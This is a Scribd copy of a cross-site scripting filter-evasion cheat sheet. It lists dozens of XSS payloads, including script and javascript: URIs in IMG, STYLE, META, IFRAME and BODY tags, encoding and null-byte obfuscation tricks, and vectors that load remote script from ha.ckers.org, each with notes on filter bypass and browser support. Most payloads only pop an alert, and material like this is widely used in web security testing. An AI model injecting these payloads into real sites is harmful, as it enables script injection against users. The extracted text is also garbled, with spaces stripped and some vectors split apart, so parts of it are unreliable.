Scribd Logo
Upload

Welcome to Scribd!

  • XSS Cross Site Scripting Cheat Sheet

    Uploaded by

    srilankanonline
    292 views18 pages
    If you're in a rush and need to quickly check a page, often times injecting the depreciated " " tag w ill be enough to check if something is vulnerable to XSS. If you don't have much space and know there is no vulnerable JavaScript on the page, this string is a nice compact XSS injection check. View source after injecting it and look for =&() no filter evasion.

    Original Description:

    Copyright

    © Attribution Non-Commercial (BY-NC)

    Available Formats

    PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document
    If you're in a rush and need to quickly check a page, often times injecting the depreciated " " tag w ill be enough to check if something is vulnerable to XSS. If you don't have much space and know there is no vulnerable JavaScript on the page, this string is a nice compact XSS injection check. View source after injecting it and look for =&() no filter evasion.

    Copyright:

    Attribution Non-Commercial (BY-NC)
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    292 views18 pages

    XSS Cross Site Scripting Cheat Sheet

    Uploaded by

    srilankanonline
    If you're in a rush and need to quickly check a page, often times injecting the depreciated " " tag w ill be enough to check if something is vulnerable to XSS. If you don't have much space and know there is no vulnerable JavaScript on the page, this string is a nice compact XSS injection check. View source after injecting it and look for =&() no filter evasion.

    Copyright:

    Attribution Non-Commercial (BY-NC)
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    of 18

    XSSlocator.Injectthisstring,andinmostcasesw hereascriptisvulnerablew ithnospecialXSS vectorrequirementsthew ord"XSS"w illpopup.UsetheURLencodingcalculatorbelow to encodetheentirestring.Tip:ifyou'reinarushandneedtoquicklycheckapage,oftentimes injectingthedepreciated"<PLAINTEXT>"tagw illbeenoughtochecktoseeifsomethingis vulnerabletoXSSbymessinguptheoutputappreciably: 'alert(String.fromCharCode(88,83,83))//\'alert(String.fro mCharCode(88,83,83))//"alert(String.fromCharCode(88, 83,83))//\"alert(String.fromCharCode(88,83,83))// ></SCRIPT>">'><SCRIPT>alert(String.

    fromCharCode(88, Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02] 83,83))</SCRIPT>

    XSSlocator2.Ifyoudon'thavemuchspaceandknow thereisnovulnerableJavaScriptonthe page,thisstringisanicecompactXSSinjectioncheck.View sourceafterinjectingitandlookfor <XSSverses&ltXSStoseeifitisvulnerable: ''!"<XSS>=&{()}

    Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

    Nofilterevasion.ThisisanormalXSSJavaScriptinjection,andmostlikelytogetcaughtbutI suggesttryingitfirst(thequotesarenotrequiredinanymodernbrow sersotheyareomitted here): <SCRIPTSRC=http://ha.ckers.org/xss.js></SCRIPT>

    Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

    ImageXSSusingtheJavaScriptdirective(IE7.0doesn'tsupporttheJavaScriptdirectiveincontext ofanimage,butitdoesinothercontexts,butthefollow ingshow theprinciplesthatw ouldw orkin othertagsasw ellI'llprobablyrevisethisatalaterdate): <IMGSRC="javascript:alert('XSS')">

    Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

    Noquotesandnosemicolon: <IMGSRC=javascript:alert('XSS')>

    Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

    CaseinsensitiveXSSattackvector: <IMGSRC=JaVaScRiPt:alert('XSS')>

    Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

    HTMLentities(thesemicolonsarerequiredforthistow ork): <IMGSRC=javascript:alert(&quotXSS&quot)>

    Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

    Graveaccentobfuscation(Ifyouneedtousebothdoubleandsinglequotesyoucanuseagrave accenttoencapsulatetheJavaScriptstringthisisalsousefulbecauselotsofcrosssite scriptingfiltersdon'tknow aboutgraveaccents): <IMGSRC=`javascript:alert("RSnakesays,'XSS'")`>

    Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

    MalformedIMGtags.OriginallyfoundbyBegeek(butcleanedupandshortenedtow orkinall brow sers),thisXSSvectorusestherelaxedrenderingenginetocreateourXSSvectorw ithinan IMGtagthatshouldbeencapsulatedw ithinquotes.Iassumethisw asoriginallymeanttocorrect sloppycoding.Thisw ouldmakeitsignificantlymoredifficulttocorrectlyparseapartanHTMLtag: <IMG"""><SCRIPT>alert("XSS")</SCRIPT>">

    Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

    fromCharCode(ifnoquotesofanykindareallow edyoucaneval()afromCharCodeinJavaScript tocreateanyXSSvectoryouneed).Clickheretobuildyourow n(thankstoHannesLeopold): <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

    UTF8Unicodeencoding(alloftheXSSexamplesthatuseajavascript:directiveinsideofan<IMG tagw illnotw orkinFirefoxorNetscape8.1+intheGeckorenderingenginemode).UsetheXSS

    calculatorformoreinformation: <IMG SRC=&#106&#97&#118&#97&#115&#99&#114&#1 05&#112&#116&#58&#97&#108&#101&#114&#11 6&#40&#39&#88&#83&#83&#39&#41> Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

    LongUTF8Unicodeencodingw ithoutsemicolons(thisisofteneffectiveinXSSthatattemptsto lookfor"&#XX",sincemostpeopledon'tknow aboutpaddingupto7numericcharacterstotal). Thisisalsousefulagainstpeoplew hodecodeagainststringslike$tmp_string=~ s/.*\&#(\d+).*/$1/w hichincorrectlyassumesasemicolonisrequiredtoterminateahtmlencoded string(I'veseenthisinthew ild): <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0 000115&#0000099&#0000114&#0000105&#0000112&# 0000116&#0000058&#0000097&#0000108&#0000101& Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02] #0000114&#0000116&#0000040&#0000039&#0000088 &#0000083&#0000083&#0000039&#0000041> Hexencodingw ithoutsemicolons(thisisalsoaviableXSSattackagainsttheabovestring $tmp_string=~s/.*\&#(\d+).*/$1/w hichassumesthatthereisanumericcharacterfollow ingthe poundsymbolw hichisnottruew ithhexHTMLcharacters).UsetheXSScalculatorformore information: <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x 69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74& #x28&#x27&#x58&#x53&#x53&#x27&#x29> Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

    Embeddedtabtobreakupthecrosssitescriptingattack: <IMGSRC="jav ascript:alert('XSS')">

    Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

    EmbeddedencodedtabtobreakupXSS: <IMGSRC="jav&#x09ascript:alert('XSS')">

    Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

    Embedednew linetobreakupXSS.Somew ebsitesclaimthatanyofthechars0913(decimal) w illw orkforthisattack.Thatisincorrect.Only09(horizontaltab),10(new line)and13(carriage return)w ork.Seetheasciichartformoredetails.Thefollow ingfourXSSexamplesillustratethis

    vector: <IMGSRC="jav&#x0Aascript:alert('XSS')">

    Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

    EmbeddedcarriagereturntobreakupXSS(Note:w iththeaboveIammakingthesestringslonger thantheyhavetobebecausethezeroscouldbeomitted.OftenI'veseenfiltersthatassumethe hexanddecencodinghastobetw oorthreecharacters.Therealruleis17characters.): <IMGSRC="jav&#x0Dascript:alert('XSS')">

    Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

    MultilineInjectedJavaScriptusingASCIIcarriagereturns(sameasaboveonlyamoreextreme exampleofthisXSSvector)thesearenotspacesjustoneofthethreecharactersasdescribed above: <IMG SRC = " Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02] j a v a NullbreaksupJavaScriptdirective.Okay,Ilied,nullcharsalsow orkasXSSvectorsbutnotlike s c above,youneedtoinjectthemdirectlyusingsomethinglikeBurpProxyoruse%00intheURL r stringorifyouw anttow riteyourow ninjectiontoolyoucaneitherusevim(^V^@w illproducea i p null)orthefollow ingprogramtogenerateitintoatextfile.Okay,Iliedagain,olderversionsof t Opera(circa7.11onWindow s)w erevulnerabletooneadditionalchar173(thesofthypen : a controlchar).Butthenullchar%00ismuchmoreusefulandhelpedmebypasscertainrealw orld l filtersw ithavariationonthisexample: e r perle'print"<IMGSRC=java\0script:alert(\"XSS\")>"'> t out ( ' X Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02] S S ' ) Nullbreaksupcrosssitescriptingvector.Hereisalittleknow nXSSattackvectorusingnull " characters.YoucanactuallybreakuptheHTMLitselfusingthesamenullsasshow nabove.I've > seenthisvectorbypasssomeofthemostrestrictiveXSSfilterstodate: perle'print"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>"'> out Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

    SpacesandmetacharsbeforetheJavaScriptinimagesforXSS(thisisusefulifthepattern matchdoesn'ttakeintoaccountspacesinthew ord"javascript:"w hichiscorrectsincethat w on'trenderandmakesthefalseassumptionthatyoucan'thaveaspacebetw eenthequote andthe"javascript:"keyw ord.Theactualrealityisyoucanhaveanycharfrom132indecimal): <IMGSRC="&#14javascript:alert('XSS')">

    Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

    NonalphanondigitXSS.WhileIw asreadingtheFirefoxHTMLparserIfoundthatitassumesa nonalphanondigitisnotvalidafteranHTMLkeyw ordandthereforconsidersittobea w hitespaceornonvalidtokenafteranHTMLtag.TheproblemisthatsomeXSSfiltersassume thatthetagtheyarelookingforisbrokenupbyw hitespace.Forexample"<SCRIPT\s"!= "<SCRIPT/XSS\s": <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

    Nonalphanondigitpart2XSS.yaw nmothbroughtmyattentiontothisvector,basedonthesame ideaasabove,how ever,Iexpandedonit,usingmyfuzzer.TheGeckorenderingengineallow s foranycharacterotherthanletters,numbersorencapsulationchars(likequotes,anglebrackets, etc...)betw eentheeventhandlerandtheequalssign,makingiteasiertobypasscrosssite scriptingblocks.Notethatthisalsoappliestothegraveaccentcharasseenhere: <BODYonload!#$%&()*~+_.,:?@[/|\]^`=alert("XSS")>

    Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

    Nonalphanondigitpart3XSS.YairAmitbroughtthistomyattentionthatthereisslightlydifferent behaviorbetw eentheIEandGeckorenderingenginesthatallow sjustaslashbetw eenthetag andtheparameterw ithnospaces.Thiscouldbeusefulifthesystemdoesnotallow spaces. <SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>

    Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

    Extraneousopenbrackets.SubmittedbyFranzSedlmaier,thisXSSvectorcoulddefeatcertain

    detectionenginesthatw orkbyfirstusingmatchingpairsofopenandcloseanglebracketsand thenbydoingacomparisonofthetaginside,insteadofamoreefficientalgorythmlikeBoyer Moorethatlooksforentirestringmatchesoftheopenanglebracketandassociatedtag(postde obfuscation,ofcourse).Thedoubleslashcommentsouttheendingextraneousbracketto supressaJavaScripterror: <<SCRIPT>alert("XSS")//<</SCRIPT>

    Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

    Noclosingscripttags.InFirefoxandNetscape8.1intheGeckorenderingenginemodeyoudon't actuallyneedthe"></SCRIPT>"portionofthisCrossSiteScriptingvector.Firefoxassumesit's safetoclosetheHTMLtagandaddclosingtagsforyou.How thoughtful!Unlikethenextone, w hichdoesn'teffectFirefox,thisdoesnotrequireanyadditionalHTMLbelow it.Youcanadd quotesifyouneedto,butthey'renotneededgenerally,althoughbew are,Ihavenoideaw hatthe HTMLw illenduplookinglikeoncethisisinjected: <SCRIPTSRC=http://ha.ckers.org/xss.js?<B>

    Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

    Protocolresolutioninscripttags.Thisparticularvariantw assubmittedbyukaszPilorzandw as basedpartiallyoffofOzh'sprotocolresolutionbypassbelow .Thiscrosssitescriptingexample w orksinIE,NetscapeinIErenderingmodeandOperaifyouaddina</SCRIPT>tagattheend. How ever,thisisespeciallyusefulw herespaceisanissue,andofcourse,theshorteryour domain,thebetter.The".j"isvalid,regardlessoftheencodingtypebecausethebrow serknow s itincontextofaSCRIPTtag. <SCRIPTSRC=//ha.ckers.org/.j>

    Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

    HalfopenHTML/JavaScriptXSSvector.UnlikeFirefoxtheIErenderingenginedoesn'taddextra datatoyourpage,butitdoesallow thejavascript:directiveinimages.Thisisusefulasavector becauseitdoesn'trequireacloseanglebracket.ThisassumesthereisanyHTMLtagbelow w hereyouareinjectingthiscrosssitescriptingvector.Eventhoughthereisnoclose">"tagthe tagsbelow itw illcloseit.Anote:thisdoesmessuptheHTML,dependingonw hatHTMLis beneathit.Itgetsaroundthefollow ingNIDSregex:/((\%3D)|(=))[^\n]*((\%3C)|<)[^\n]+((\%3E)|>)/ becauseitdoesn'trequiretheend">".Asasidenote,thisw asalsoaffectiveagainstarealw orld XSSfilterIcameacrossusinganopenended<IFRAMEtaginsteadofan<IMGtag:

    <IMGSRC="javascript:alert('XSS')"

    Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

    Doubleopenanglebrackets.ThisisanoddonethatStevenChristeybroughttomyattention.At firstImisclassifiedthisasthesameXSSvectorasabovebutit'ssurprisinglydifferent.Usingan openanglebracketattheendofthevectorinsteadofacloseanglebracketcausesdifferent behaviorinNetscapeGeckorendering.Withoutit,Firefoxw illw orkbutNetscapew on't: <iframesrc=http://ha.ckers.org/scriptlet.html<

    Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

    XSSw ithnosinglequotesordoublequotesorsemicolons: <SCRIPT>a=/XSS/ alert(a.source)</SCRIPT> Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

    EscapingJavaScriptescapes.Whentheapplicationisw rittentooutputsomeuserinformation insideofaJavaScriptlikethefollow ing:<SCRIPT>vara="$ENV{QUERY_STRING}"</SCRIPT>and youw anttoinjectyourow nJavaScriptintoitbuttheserversideapplicationescapescertain quotesyoucancircumventthatbyescapingtheirescapecharacter.Whenthisisgetsinjectedit w illread<SCRIPT>vara="\\"alert('XSS')//"</SCRIPT>w hichendsupunescapingthedouble quoteandcausingtheCrossSiteScriptingvectortofire.TheXSSlocatorusesthismethod.: \"alert('XSS')//

    Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

    Endtitletag.ThisisasimpleXSSvectorthatcloses<TITLE>tags,w hichcanencapsulatethe maliciouscrosssitescriptingattack: </TITLE><SCRIPT>alert("XSS")</SCRIPT>

    Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

    INPUTimage:

    <INPUTTYPE="IMAGE"SRC="javascript:alert('XSS')">

    Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

    BODYimage: <BODYBACKGROUND="javascript:alert('XSS')">

    Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

    BODYtag(Ilikethismethodbecauseitdoesn'trequireusinganyvariantsof"javascript:"or "<SCRIPT..."toaccomplishtheXSSattack).DanCrow leyadditionallynotedthatyoucanputa spacebeforetheequalssign("onload="!="onload="): <BODYONLOAD=alert('XSS')>

    Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

    EventHandlersthatcanbeusedinsimilarXSSattackstotheoneabove(thisisthemost comprehensivelistonthenet,atthetimeofthisw riting).PleasenoteIhaveexcludedbrow ser supportfromthissectionbecauseeachonemayhavedifferentresultsindifferentbrow sers. ThankstoReneLedosquetfortheHTML+TIMEupdates: 1. FSCommand()(attackercanusethisw hen executedfromw ithinanembeddedFlashobject) 2. onAbort()(w henuserabortstheloadingofan image) 3. onActivate()(w henobjectissetastheactive element) 4. onAfterPrint()(activatesafteruserprintsor IMGDynsrc: preview sprintjob) 5. onAfterUpdate()(activatesondataobjectafter <IMGDYNSRC="javascript:alert('XSS')"> updatingdatainthesourceobject) 6. onBeforeActivate()(firesbeforetheobjectisset astheactiveelement) Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02] 7. onBeforeCopy()(attackerexecutestheattack stringrightbeforeaselectioniscopiedtotheclipboard attackerscandothisw iththeexecCommand("Copy") function) 8. onBeforeCut()(attackerexecutestheattackstring IMGlow src: rightbeforeaselectioniscut) <IMGLOWSRC="javascript:alert('XSS')"> 9. onBeforeDeactivate()(firesrightafterthe activeElementischangedfromthecurrentobject) 10. onBeforeEditFocus()(Firesbeforeanobject containedinaneditableelemententersaUIactivated Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02] stateorw henaneditablecontainerobjectiscontrol selected) 11. onBeforePaste()(userneedstobetrickedinto pastingorbeforcedintoitusingthe

    BGSOUND: <BGSOUNDSRC="javascript:alert('XSS')">

    Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

    &JavaScriptincludes(w orksinNetscape4.x): <BRSIZE="&{alert('XSS')}">

    Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02][NS4]

    LAYER(alsoonlyw orksinNetscape4.x) <LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER> Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02][NS4]

    STYLEsheet: <LINKREL="stylesheet"HREF="javascript:alert('XSS')">

    Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

    Remotestylesheet(usingsomethingassimpleasaremotestylesheetyoucanincludeyourXSS asthestyleparametercanberedefinedusinganembeddedexpression.)Thisonlyw orksinIE andNetscape8.1+inIErenderingenginemode.Noticethatthereisnothingonthepagetoshow thatthereisincludedJavaScript.Note:Withalloftheseremotestylesheetexamplestheyusethe bodytag,soitw on'tw orkunlessthereissomecontentonthepageotherthanthevectoritself, soyou'llneedtoaddasinglelettertothepagetomakeitw orkifit'sanotherw iseblankpage: <LINKREL="stylesheet" HREF="http://ha.ckers.org/xss.css"> Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

    Remotestylesheetpart2(thisw orksthesameasabove,butusesa<STYLE>taginsteadofa <LINK>tag).Aslightvariationonthisvectorw asusedtohackGoogleDesktop.Asasidenote, youcanremovetheend</STYLE>tagifthereisHTMLimmediatelyafterthevectortocloseit. Thisisusefulifyoucannothaveeitheranequalssignoraslashinyourcrosssitescripting attack,w hichhascomeupatleastonceintherealw orld:

    <STYLE>@import'http://ha.ckers.org/xss.css'</STYLE>

    Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

    Remotestylesheetpart3.Thisonlyw orksinOpera8.0(nolongerin9.x)butisfairlytricky. AccordingtoRFC2616settingalinkheaderisnotpartoftheHTTP1.1spec,how eversome brow sersstillallow it(likeFirefoxandOpera).ThetrickhereisthatIamsettingaheader(w hich isbasicallynodifferentthanintheHTTPheadersayingLink:<http://ha.ckers.org/xss.css> REL=stylesheet)andtheremotestylesheetw ithmycrosssitescriptingvectorisrunningthe JavaScript,w hichisnotsupportedinFireFox: <METAHTTPEQUIV="Link" Content="<http://ha.ckers.org/xss.css> REL=stylesheet"> Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

    Remotestylesheetpart4.Thisonlyw orksinGeckorenderingenginesandw orksbybindingan XULfiletotheparentpage.IthinktheironyhereisthatNetscapeassumesthatGeckoissafer andthereforisvulnerabletothisforthevastmajorityofsites: <STYLE>BODY{moz binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</ST YLE> Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

    Localhtcfile.Thisisalittledifferentthantheabovetw ocrosssitescriptingvectorsbecauseit usesan.htcfilew hichmustbeonthesameserverastheXSSvector.Theexamplefilew orksby pullingintheJavaScriptandrunningitaspartofthestyleattribute: <XSSSTYLE="behavior:url(xss.htc)">

    Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

    Liststyleimage.Fairlyesotericissuedealingw ithembeddingimagesforbulletedlists.Thisw ill onlyw orkintheIErenderingenginebecauseoftheJavaScriptdirective.Notaparticularlyuseful crosssitescriptingvector: <STYLE>li{liststyleimage: url("javascript:alert('XSS')")}</STYLE><UL><LI>XSS Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

    VBscriptinanimage: <IMGSRC='vbscript:msgbox("XSS")'>

    Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

    Mocha(olderversionsofNetscapeonly): <IMGSRC="mocha:[code]">

    Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02][NS4]

    Livescript(olderversionsofNetscapeonly): <IMGSRC="livescript:[code]">

    Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02][NS4]

    USASCIIencoding(foundbyKurtHuw ig).ThisusesmalformedASCIIencodingw ith7bits insteadof8.ThisXSSmaybypassmanycontentfiltersbutonlyw orksifthehosttransmitsinUS ASCIIencoding,orifyousettheencodingyourself.Thisismoreusefulagainstw ebapplication firew allcrosssitescriptingevasionthanitisserversidefilterevasion.ApacheTomcatistheonly know nserverthattransmitsinUSASCIIencoding.Ihighlysuggestanyoneinterestedinalternate encodingissueslookatmycharsetsissuespage: scriptalert(XSS)/script

    Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02][NS4]

    META(theoddthingaboutmetarefreshisthatitdoesn'tsendareferrerintheheadersoitcan beusedforcertaintypesofattacksw hereyouneedtogetridofreferringURLs): <METAHTTPEQUIV="refresh" CONTENT="0url=javascript:alert('XSS')"> Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

    METAusingdata:directiveURLscheme.Thisisnicebecauseitalsodoesn'thaveanythingvisibly thathasthew ordSCRIPTortheJavaScriptdirectiveinit,becauseitutilizesbase64encoding. PleaseseeRFC2397formoredetailsorgohereorheretoencodeyourow n.Youcanalsouse theXSScalculatorbelow ifyoujustw anttoencoderaw HTMLorJavaScriptasithasaBase64

    encodingmethod: <METAHTTPEQUIV="refresh" CONTENT="0url=data:text/htmlbase64,PHNjcmlw dD5hb GVydCgnWFNTJyk8L3Njcmlw dD4K"> Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

    METAw ithadditionalURLparameter.Ifthetargetw ebsiteattemptstoseeiftheURLcontains "http://"atthebeginningyoucanevadeitw iththefollow ingtechnique(SubmittedbyMoritz Naumann): <METAHTTPEQUIV="refresh"CONTENT="0 URL=http://URL=javascript:alert('XSS')"> Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

    IFRAME(ififramesareallow edtherearealotofotherXSSproblemsasw ell): <IFRAMESRC="javascript:alert('XSS')"></IFRAME>

    Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

    FRAME(frameshavethesamesortsofXSSproblemsasiframes): <FRAMESET><FRAME SRC="javascript:alert('XSS')"></FRAMESET> Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

    TABLE(w how ouldhavethoughttablesw ereXSStargets...exceptme,ofcourse): <TABLEBACKGROUND="javascript:alert('XSS')">

    Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

    TD(justlikeabove,TD'sarevulnerabletoBACKGROUNDscontainingJavaScriptXSSvectors): <TABLE><TDBACKGROUND="javascript:alert('XSS')">

    Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

    DIVbackgroundimage:

    <DIVSTYLE="backgroundimage: url(javascript:alert('XSS'))"> Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

    DIVbackgroundimagew ithunicodedXSSexploit(thishasbeenmodifiedslightlytoobfuscatethe urlparameter).Theoriginalvulnerabilityw asfoundbyRenaudLifchitzasavulnerabilityinHotmail: <DIVSTYLE="background image:\0075\0072\006C\0028'\006a\0061\0076\0061\00 73\0063\0072\0069\0070\0074\003a\0061\006c\0065\00 72\0074\0028.1027\0058.1053\0053\0027\0029'\0029"> Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

    DIVbackgroundimageplusextracharacters.IbuiltaquickXSSfuzzertodetectanyerroneous charactersthatareallow edaftertheopenparenthesisbutbeforetheJavaScriptdirectiveinIE andNetscape8.1insecuresitemode.Theseareindecimalbutyoucanincludehexandadd paddingofcourse.(Anyofthefollow ingcharscanbeused:132,34,39,160,81928.13,12288, 65279): <DIVSTYLE="backgroundimage: url(&#1javascript:alert('XSS'))"> Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

    DIVexpressionavariantofthisw aseffectiveagainstarealw orldcrosssitescriptingfilter usinganew linebetw eenthecolonand"expression": <DIVSTYLE="w idth:expression(alert('XSS'))">

    Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

    STYLEtagsw ithbrokenupJavaScriptforXSS(thisXSSattimessendsIEintoaninfiniteloopof alerts): <STYLE>@im\port'\ja\vasc\ript:alert("XSS")'</STYLE>

    Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

    STYLEattributeusingacommenttobreakupexpression(ThankstoRomanIvanovforthisone): <IMGSTYLE="xss:expr/*XSS*/ession(alert('XSS'))">

    Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

    AnonymousHTMLw ithSTYLEattribute(IE6.0andNetscape8.1+inIErenderingenginemode don'treallycareiftheHTMLtagyoubuildexistsornot,aslongasitstartsw ithanopenangle bracketandaletter): <XSSSTYLE="xss:expression(alert('XSS'))">

    Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

    IMGSTYLEw ithexpression(thisisreallyahybridoftheaboveXSSvectors,butitreallydoes show how hardSTYLEtagscanbetoparseapart,likeabovethiscansendIEintoaloop): exp/*<ASTYLE='no\xss:noxss("*//*") xss:&#101x&#x2F*XSS*//*/*/pression(alert("XSS"))'> Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

    STYLEtag(OlderversionsofNetscapeonly): <STYLETYPE="text/javascript">alert('XSS')</STYLE>

    Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02][NS4]

    STYLEtagusingbackgroundimage: <STYLE>.XSS{background image:url("javascript:alert('XSS')")}</STYLE><A CLASS=XSS></A> Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

    STYLEtagusingbackground: <STYLE type="text/css">BODY{background:url("javascript:alert( 'XSS')")}</STYLE> Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

    Dow nlevelHiddenblock(onlyw orksinIE5.0andlaterandNetscape8.1inIErenderingengine mode).Somew ebsitesconsideranythinginsideacommentblocktobesafeandthereforedoes notneedtoberemoved,w hichallow sourCrossSiteScriptingvector.Orthesystemcouldadd commenttagsaroundsomethingtoattempttorenderitharmless.Asw ecansee,thatprobably

    w ouldn'tdothejob: <![ifgteIE4]> <SCRIPT>alert('XSS')</SCRIPT> <![endif]> Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

    BASEtag.WorksinIEandNetscape8.1insafemode.Youneedthe//tocommentoutthenext characterssoyouw on'tgetaJavaScripterrorandyourXSStagw illrender.Also,thisrelieson thefactthatthew ebsiteusesdynamicallyplacedimageslike"images/image.jpg"ratherthanfull paths.Ifthepathincludesaleadingforw ardslashlike"/images/image.jpg"youcanremoveone slashfromthisvector(aslongastherearetw otobeginthecommentthisw illw ork): <BASEHREF="javascript:alert('XSS')//">

    Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

    OBJECTtag(iftheyallow objects,youcanalsoinjectviruspayloadstoinfecttheusers,etc.and samew iththeAPPLETtag).ThelinkedfileisactuallyanHTMLfilethatcancontainyourXSS: <OBJECTTYPE="text/xscriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

